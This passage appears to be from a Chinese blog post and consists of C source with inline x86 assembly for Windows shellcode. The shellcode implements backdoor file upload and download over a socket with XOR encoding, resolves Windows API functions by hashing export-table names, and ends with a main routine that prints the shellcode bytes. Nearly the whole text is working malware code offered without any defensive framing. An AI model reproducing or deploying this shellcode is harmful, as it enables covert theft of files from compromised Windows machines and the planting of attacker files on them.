- get_file:
- //int 3
- mov byte ptr [esi+_sbuf+eax-1], 0
- lea edx, [esi+_sbuf+4] ; "get " filename
- xor eax, eax
- push eax
- push eax
- push 3 ; OPEN_EXISTING
- push eax ; lap
- push eax
- push 0x02000000 ; MAXIMUM_ALLOWED
- push edx ; filename
- call dword ptr [esi+_CreateFileA]
- //---- 判断文件打开是否成功-------
- inc eax
- test eax, eax
- jz k1
- dec eax
- //---------------------------------
- mov [esi+_hout0], eax
-
- transfer:
- push 0 ; null or &lap
- lea edx, [esi+_cnt]
- push edx ; read size actualy
- push 0x40 ; read size
- lea edx, [esi+_pbuf]
- push edx
- push [esi+_hout0]
- call dword ptr [esi+_ReadFile]
- mov ecx, [esi+_cnt]
- jecxz transfer_finish ; None to read
-
- lea edx, [esi+_pbuf]
- call xor_data
- push 0
- push [esi+_cnt]
- lea edx, [esi+_pbuf]
- push edx
- push [esi+_hsck]
- call dword ptr [esi+_send]
- jmp transfer
- transfer_finish:
- push [esi+_hout0]
- call dword ptr [esi+_CloseHandle]
- jmp k1
- put_file:
- //int 3
- mov byte ptr [esi+_sbuf+eax-1], 0
- lea edx, [esi+_sbuf+4] ; filename after "put "
- xor eax, eax
- push eax
- push eax
- push 2 ; CREATE_ALWAYS
- push eax ; lap
- push eax
- push 0x02000000 ; MAXIMUM_ALLOWED
- push edx ; filename
- call dword ptr [esi+_CreateFileA]
- //---- 判断文件创建是否成功-------
- //inc eax
- //test eax, eax
- //jz k1
- //dec eax
- //--------------------------------
- mov [esi+_hout0], eax
- upload:
- push 0
- push 0x40
- lea edx, [esi+_pbuf]
- push edx
- push [esi+_hsck]
- call dword ptr [esi+_recv] // recv(_hsck, _pbuf, 64, 0);
- //-----------------------------
- cmp dword ptr [esi+_pbuf], 21444E45h // 判断结束字符串END!
- jz upload_finish
- //-----------------------------
- lea edx, [esi+_pbuf]
- push eax
- pop ecx
- call xor_data // xor_data(_pbuf, len);
- push 0
- lea edx, [esi+_cnt]
- push edx
- push eax
- lea edx, [esi+_pbuf]
- push edx
- push [esi+_hout0]
- call dword ptr [esi+_WriteFile] // WriteFile(_hout0, _pbuf, len, _cnt, 0);
- //push 0
- //push esp
- //push 4004667Fh
- //push [esi+_hsck]
- //call dword ptr [esi+_ioctlsocket] // ioctlsocket(_hsck, FIONREAD, &i); i = 0
- //pop ecx
- //jecxz upload_finish
-
- jmp upload
-
- upload_finish:
- //int 3
- push [esi+_hout0]
- call dword ptr [esi+_CloseHandle] // CloseHandle(_hout0);
- mov byte ptr [esi+_sbuf], 0x0a
- push 1
- pop eax
- jmp restore
- xor_data:
- dec edx
- xor_work:
- xor byte ptr [edx+ecx], Xor_key
- loop xor_work
- ret
- find_hashfunc_addr:
- push ecx
- push esi
- mov esi, [ebp+3Ch] ; e_lfanew
- mov esi, [esi+ebp+78h] ; ExportDirectory RVA
- add esi, ebp ; rva2va
- push esi
- mov esi, [esi+20h] ; AddressOfNames RVA
- add esi, ebp ; rva2va
- xor ecx, ecx
- dec ecx
-
- find_start:
- inc ecx
- lodsd
- add eax, ebp
- xor ebx, ebx
-
- hash_loop:
- movsx edx, byte ptr [eax]
- cmp dl, dh
- jz short find_addr
- ror ebx, 7 ; hash
- add ebx, edx
- inc eax
- jmp short hash_loop
-
- find_addr:
- cmp ebx, [edi] ; compare to hash
- jnz short find_start
- pop esi ; ExportDirectory
- mov ebx, [esi+24h] ; AddressOfNameOrdinals RVA
- add ebx, ebp ; rva2va
- mov cx, [ebx+ecx*2] ; FunctionOrdinal
- mov ebx, [esi+1Ch] ; AddressOfFunctions RVA
- add ebx, ebp ; rva2va
- mov eax, [ebx+ecx*4] ; FunctionAddress RVA
- add eax, ebp ; rva2va
- stosd ; function address save to [edi]
- pop esi
- pop ecx
- retn
- locate_addr:
- call func_start
- PROC_END //C macro to end proc
- }
- }
- int main(int argc, char *argv[])
- {
- unsigned char Buff[2048];
- GetShellCode();
- PrintSc(sh_Buff, sh_Len);
- //PrintSc(Buff, sizeof(Buff));
- return 1;
- }
阅读(1184) | 评论(0) | 转发(0) |